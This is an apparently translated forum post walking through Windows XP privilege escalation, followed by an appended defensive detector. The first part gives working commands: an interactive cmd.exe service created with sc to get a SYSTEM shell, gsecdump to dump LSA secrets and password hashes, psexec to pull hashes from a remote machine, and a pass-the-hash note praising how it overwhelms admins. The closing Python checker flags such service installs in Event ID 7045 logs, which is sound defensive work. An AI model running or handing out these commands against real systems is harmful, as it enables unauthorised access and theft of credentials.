To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A quick note: you can use iam from the pshtools toolkit to load the hash information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good at this; admins will have their hands full now. The LM/NT hashes picked up during ARP spoofing, and the ones obtained with gethash, actually don't need to be cracked at all; it's purely a matter of using the tools. As the original article puts it well, whether the password is 4 characters or 127, once you have the hash you're 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
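Added example from the defender's side, not code from the post or from TrueSec: a small Python checker that scans records shaped like Windows System log Event ID 7045 (a service was installed) for the two things the post relies on, a service whose image is cmd.exe with the interactive flag (sc create ... type= interact) and the PSEXESVC service that PsExec registers on the target. The field names and the sample entries are constructed assumptions for this example.

```python
# Service Type bit flags as stored in the registry Type value under
# HKLM\SYSTEM\CurrentControlSet\Services\<name> and set by "sc create ... type=".
SERVICE_WIN32_OWN_PROCESS = 0x10      # type= own
SERVICE_INTERACTIVE_PROCESS = 0x100   # type= interact

# A service whose ImagePath is a command interpreter is the "sc create ... cmd.exe /K start"
# trick from the post; PSEXESVC is the service PsExec registers when it pushes a binary.
SHELL_IMAGES = {"cmd.exe", "command.com", "powershell.exe"}
REMOTE_EXEC_SERVICES = {"psexesvc"}

# Constructed sample records shaped like the fields of System log Event ID 7045
# ("A service was installed in the system"); ServiceType holds the numeric Type flags.
# These entries are made up for this example, not real log data.
SAMPLE_7045 = [
    {"ServiceName": "shellcmdline", "ImagePath": r"C:\WINDOWS\system32\cmd.exe /K start",
     "ServiceType": SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
     "AccountName": "LocalSystem"},
    {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "ServiceType": SERVICE_WIN32_OWN_PROCESS, "AccountName": "LocalSystem"},
    {"ServiceName": "wuauserv", "ImagePath": r"%SystemRoot%\system32\svchost.exe -k netsvcs",
     "ServiceType": 0x20, "AccountName": "LocalSystem"},
]

def image_basename(image_path):
    """Lower-cased executable name from an ImagePath, handling quoted paths."""
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        exe = path[1:end] if end != -1 else path[1:]
    else:
        exe = path.split(maxsplit=1)[0] if path else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess_service_install(rec):
    """Reasons a 7045-style record matches the technique in the post (empty list if none)."""
    reasons = []
    exe = image_basename(rec["ImagePath"])
    if exe in SHELL_IMAGES:
        reasons.append(f"service image is a command interpreter ({exe})")
    if rec["ServiceType"] & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("SERVICE_INTERACTIVE_PROCESS set (sc ... type= interact)")
    if rec["ServiceName"].lower() in REMOTE_EXEC_SERVICES:
        reasons.append("service name matches PsExec's PSEXESVC")
    if reasons and rec["AccountName"] == "LocalSystem":
        reasons.append("runs as LocalSystem")
    return reasons

def find_suspicious(records):
    """Map each flagged service name to its list of reasons."""
    return {r["ServiceName"]: assess_service_install(r) for r in records if assess_service_install(r)}
```

Feeding real 7045 events through the same checks also catches the 1053 timeout pattern indirectly: a command interpreter registered as an interactive service never reports to the SCM, so the install record is the only trace the service manager leaves.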